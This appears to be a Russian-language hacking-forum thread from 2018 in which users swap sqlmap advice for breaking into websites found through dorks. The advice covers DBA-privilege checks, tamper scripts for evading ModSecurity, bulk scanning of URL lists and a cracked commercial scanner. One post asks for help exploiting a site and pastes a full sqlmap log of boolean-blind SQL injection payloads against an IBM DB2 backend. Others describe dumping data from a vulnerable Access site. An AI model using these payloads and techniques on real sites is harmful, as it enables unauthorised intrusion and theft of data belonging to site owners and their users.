Запросы из бд отрабатывают, но вот бы исходники сайта еще просмотреть.

GoodBoy
20.07.2018, 04:26
Здравствуйте. Сколько не сканировал сайты по доркам, (качество сайтов, определенно не лучшее) - никогда не попадалось is-dba=true, это нормально?

grimnir
21.07.2018, 12:57
GoodBoy said:
↑ (https://antichat.live/posts/4228539/)
Здравствуйте. Сколько не сканировал сайты по доркам, (качество сайтов, определенно не лучшее) - никогда не попадалось is-dba=true, это нормально?


сайтов с нужными правами мало осталось

https://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html

cat1vo
21.07.2018, 13:53
GoodBoy said:
↑ (https://antichat.live/posts/4228539/)
Здравствуйте. Сколько не сканировал сайты по доркам, (качество сайтов, определенно не лучшее) - никогда не попадалось is-dba=true, это нормально?


Даже наличие прав, не всегда панацея, сейчас повсеместно включен secure-file-priv

https://dev.mysql.com/doc/refman/5.7/en/server-options.html#option_mysqld_secure-file-priv

GoodBoy
21.07.2018, 15:22
grimnir said:
↑ (https://antichat.live/posts/4229053/)
сайтов с нужными правами мало осталось
https://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html


Теперь я понял, какие сайты нужны)

.SpoilerTarget" type="button">Spoiler

Lazy
26.07.2018, 01:01
Нашел бажный скрипт , который стоит на нескольких сайтах . Sqlmap почти нормально читает через сиквел . Почти потому , что скрипт или сервер заменяет символ нижнего подчеркивания на запятую или дефис . При этом я могу читать имена баз , таблиц и чаще всего столбцы . Но не могу дампить .

--hex вроде бы решает проблему , но данные все равно не дампятся . Tamper не помогает .

Как я понял из ответов curl нижнее подчеркивание и все до него вырезается из имени таблицы при запросе . Таблица вида site_users в select запросе превращается в просто users .

Но при этом всем мне удалось все же найти один сайт где с --hex нужные таблицы нормально читаются :\

Хочется понять откуда у этого растут ноги . Это сам скрипт творит , или фаер , или может модуль апача так извращается ?

Ну и реально ли как-то заэкранировать нижнее подчеркивание в запросе .

cna
01.08.2018, 03:30
надо чекнуть что фильтрует и обойти для начала) попробуй обычно если норм составишь запрос за раз --sql-query норм вывоит

бывают такие заморочки от того что можно указывать части запроса отдельно в специальных переменных до просто обычных глюков скульмапчика с кучей запросов или банальная ошибка синтаксиса но если возможность вывести колонки в работе с вафом можно фазить все слова символы в разные кодировк смешаны с заменой в тампере зависит какая бд? и очень важно не стрессить себя и свою плату особенно с большим количеством блайнд запросов что бы там не сбилось нече --no-cast

стукни чекну)

cna
01.08.2018, 03:47
cat1vo said:
↑ (https://antichat.live/posts/4229081/)
Даже наличие прав, не всегда панацея, сейчас повсеместно включен
secure-file-priv
https://dev.mysql.com/doc/refman/5.7/en/server-options.html#option_mysqld_secure-file-priv


считаю если с прив все ок то помоему нельзя залиться только если не понятно почему не выдает пути к специальной папке вне корня надо инклуд или как еще отуда дальше) и откуда то

интересно мускуль еще не научился как то кампастить с отведенной папки то?)

ну тут или обойти исполнения или надо понять как можно обойти эту опцию)

Sentureg
04.08.2018, 15:31
Помогите раскрутить сайт

Parameter: SiteId (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Vector: AND [INFERENCE]


Code:
[14:07:25] [INFO] the back-end DBMS is IBM DB2
back-end DBMS: IBM DB2
[14:07:25] [INFO] fetching current user
[14:07:25] [PAYLOAD] 200001
[14:07:25] [INFO] retrieving the length of query output
[14:07:25] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'PPkh'='PPkh
[14:07:28] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'PPkh'='PPkh
[14:07:29] [INFO] retrieved:
[14:07:29] [DEBUG] performed 4 queries in 3.84 seconds
[14:07:29] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh
[14:07:30] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'PPkh'='PPkh
[14:07:34] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'PPkh'='PPkh
[14:07:36] [INFO] retrieved:
[14:07:36] [DEBUG] performed 9 queries in 10.87 seconds
current user: None
[14:07:36] [INFO] testing if current user is DBA
current user is DBA: True
[14:07:36] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[14:07:36] [INFO] fetching database (schema) names
[14:07:36] [INFO] fetching number of databases
[14:07:36] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(66) AND 'MrxP'='MrxP
[14:07:39] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(97) AND 'MrxP'='MrxP
[14:07:42] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(101) AND 'MrxP'='MrxP
[14:07:43] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(119) AND 'MrxP'='MrxP
[14:07:44] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(120) AND 'MrxP'='MrxP
[14:07:45] [INFO] retrieved:
[14:07:45] [DEBUG] performed 5 queries in 8.49 seconds
[14:07:45] [ERROR] unable to retrieve the number of databases
[14:07:45] [INFO] falling back to current database
[14:07:45] [INFO] fetching current database
[14:07:45] [INFO] retrieving the length of query output
[14:07:45] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'SSnj'='SSnj
[14:07:46] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COAL ESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'SSnj'='SSnj
[14:07:48] [INFO] retrieved:
[14:07:48] [DEBUG] performed 4 queries in 3.55 seconds
[14:07:48] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'SSnj'='SSnj
[14:07:49] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'SSnj'='SSnj
[14:07:51] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'SSnj'='SSnj
[14:07:54] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'SSnj'='SSnj
[14:07:55] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'SSnj'='SSnj
[14:07:59] [INFO] retrieved:
[14:07:59] [DEBUG] performed 9 queries in 13.88 seconds
[14:07:59] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:07:59] [CRITICAL] unable to retrieve the database names

shutting down at 14:07:59

пробывал --hex, --no-cast, не помогает

aZohan
26.08.2018, 16:41
Всем доброго времени суток, использую sqlmap на Kali, насколько мне известно, сканирование пишется в лог, и после повторного сканирования sqlmap берет предыдущие результаты из лога, скажите пожалуйста, как очистить лог? Папку output не обнаружил.

erwerr2321
26.08.2018, 17:21
@aZohan (https://antichat.live/members/304693/)

обычно

file:///хоум фолдер/.sqlmap/output

h3xp1017
26.08.2018, 17:47
aZohan said:
↑ (https://antichat.live/posts/4239975/)
Всем доброго времени суток, использую sqlmap на Kali, насколько мне известно, сканирование пишется в лог, и после повторного сканирования sqlmap берет предыдущие результаты из лога, скажите пожалуйста, как очистить лог? Папку output не обнаружил.


session.sqlite

не?

aZohan
26.08.2018, 18:28
h3xp1017 said:
↑ (https://antichat.live/posts/4239989/)
session.sqlite
не?


вы имеете ввиду предыдущую сессию? Не совсем понял вас. Вот еще что думаю, юзаю предустановленный софт sqlmap, может лучше будет склонировать его с git's ?

cat1vo
26.08.2018, 22:22
aZohan said:
↑ (https://antichat.live/posts/4239975/)
Всем доброго времени суток, использую sqlmap на Kali, насколько мне известно, сканирование пишется в лог, и после повторного сканирования sqlmap берет предыдущие результаты из лога, скажите пожалуйста, как очистить лог? Папку output не обнаружил.


--flush-session Flush session files for current target

--fresh-queries Ignore query results stored in session file

Заглядывайте чаще в мануал (https://github.com/sqlmapproject/sqlmap/wiki/Usage)

aZohan
27.08.2018, 18:07
Всем доброго время суток! По вашему мнению, что лучше использовать: предустановленный sqlmap в kali linux или лучше склонировать с github?

SooLFaa
30.08.2018, 13:09
aZohan said:
↑ (https://antichat.live/posts/4240223/)
Всем доброго время суток! По вашему мнению, что лучше использовать: предустановленный sqlmap в kali linux или лучше склонировать с github?


apt-get update && apt-get upgrade && apt-get dist-upgrade

dmax0fw
30.08.2018, 15:20
SooLFaa said:
↑ (https://antichat.live/posts/4240773/)
apt-get update & apt-get upgrade & apt-get
dist-upgrade


а зачем всё это в бэкграунде выполнять?

SooLFaa
30.08.2018, 15:24
dmax0fw said:
↑ (https://antichat.live/posts/4240805/)
а зачем всё это в бэкграунде выполнять?


Схлопнул второй амперсанд.

aZohan
30.08.2018, 16:18
SooLFaa said:
↑ (https://antichat.live/posts/4240773/)
apt-get update && apt-get upgrade && apt-get
dist-upgrade


Благодарю за ответ. Ежедневно выполняю следующие команды: sudo apt update, sudo apt upgrade. Разницы же нет у команд: sudo apt upgrade, sudo apt full-upgrade и sudo apt dist-upgrade?

SooLFaa
30.08.2018, 17:19
Разница есть, но не в данном случае.

Xsite
04.09.2018, 00:29
Ребят сори за тупой вопрос

возможно ли мепу задать через команду

--batch что бы сначала он сам задавал ответ "N" , но если идет крит подключения , от дампа , он сам отвечал "Y"

cat1vo
04.09.2018, 04:00
Xsite said:
↑ (https://antichat.live/posts/4241700/)
Ребят сори за тупой вопрос
возможно ли мепу задать через команду
--batch что бы сначала он сам задавал ответ "N" , но если идет крит подключения , от дампа , он сам отвечал "Y"


--answers (https://github.com/sqlmapproject/sqlmap/wiki/Usage)=ANSWERS Set question answers (e.g. "quit=N,follow=N")

Там куча разных условий ответа!

Пример:

--batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"

Xsite
04.09.2018, 15:51
cat1vo said:
↑ (https://antichat.live/posts/4241725/)
--answers (https://github.com/sqlmapproject/sqlmap/wiki/Usage)
=ANSWERS Set question answers (e.g. "quit=N,follow=N")
Там куча разных условий ответа!
Пример:
--batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"


Спасибо так намного проще )

aZohan
07.09.2018, 15:19
Всем доброго времени суток, может кто подсказать какой тампер против этого waf идёт "[CRITICAL] WAF/IPS/IDS identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'"

Заранее благодарен.

joelblack
07.09.2018, 15:29
Попробуй:


Code:
--tamper "modsecurityzeroversioned.py"

aZohan
07.09.2018, 15:35
joelblack said:
↑ (https://antichat.live/posts/4242632/)
Попробуй:

Code:
--tamper "modsecurityzeroversioned.py"



буду пробовать эти:

modsecurityversioned.py окружает полный запрос комментариями

modsecurityzeroversioned.py окружает комментарии, "0" полным запросом

winstrool
07.09.2018, 16:08
aZohan said:
↑ (https://antichat.live/posts/4242634/)
буду пробовать эти:
modsecurityversioned.py окружает полный запрос комментариями
modsecurityzeroversioned.py окружает комментарии, "0" полным запросом


Вообще суть тамперов, как они работают можно посмотреть в папке sqlmap'a tamper, частенько бывает что в наборе нету нужного, тогда изучаем суть WAF'a, создаем свой тампер и кладем в папочку, дальше просто его подключаем.

mardoksp
07.09.2018, 16:51
Может кто помочь получить список из старой Microsoft Access? Какой тампер можно применить?

Sensoft
07.09.2018, 17:32
mardoksp said:
↑ (https://antichat.live/posts/4242656/)
Может кто помочь получить список из старой Microsoft Access? Какой тампер можно применить?
View attachment 5922 (https://antichat.live/attachments/5922.img)


--no-cast или --hex в помощь

mardoksp
07.09.2018, 17:35
Sensoft said:
↑ (https://antichat.live/posts/4242669/)
--no-cast или --hex в помощь


да это уже первое испробовал, нет результата.

Sensoft
07.09.2018, 17:42
mardoksp said:
↑ (https://antichat.live/posts/4242671/)
да это уже первое испробовал, нет результата.


Netsparker_Pro_4.9.5.17582_fu11

Крути

Не раз помогал когда не получалось самому

Он если крутанёт там можно скопировать запрос sqlmap

Но раскрутил он или нет определяется если там горит иконка sql injection и если он выявляет версию и bd значит крутанул

После чего копируешь запрос в sqlmap и дальше вставляешь и сам уже вытаскиваешь что надо

mardoksp
07.09.2018, 19:11
Походу не крутанул, только пишет, что Possible SQL inject

Sensoft
07.09.2018, 19:55
mardoksp said:
↑ (https://antichat.live/posts/4242706/)
Походу не крутанул, только пишет, что Possible SQL inject


Слепая

если сайт говно то забей

если прям срочно нужно то пытайся что то сделать, выкинь скулю сюда может сможем помочь

aZohan
07.09.2018, 20:21
Уважаемые, подскажите пожалуйста есть список урлов, какой опцией вставить его в sqlmap?

mardoksp
07.09.2018, 20:22
использую wordlist подобрало таблицу и колонки. Ну а дальше без проблему получил данные

joelblack
07.09.2018, 21:01
aZohan said:
↑ (https://antichat.live/posts/4242726/)
Уважаемые, подскажите пожалуйста есть список урлов, какой опцией вставить его в sqlmap?




Code:
-m BULKFILE Scan multiple targets given in a textual file

aZohan
11.09.2018, 22:47
Уважаемые, доброго времени суток, подскажите пожалуйста, а то не могу вникнуть, натравливаю sqlmap на текстовый файл с линками, в опциях включаю --batch прописываю директорию --output-dir=output, и вот вопрос в чем, вот sqlmap прогладил все цели, что то не нашел, что то нашел, я могу увидеть уязвимые сайты в логах этой папки? Прощупывал один сайт на уязвимость, он оказался пустым и логи оказались пустыми, или он запишет в логи только то что нашел или я что то неправильно сделал?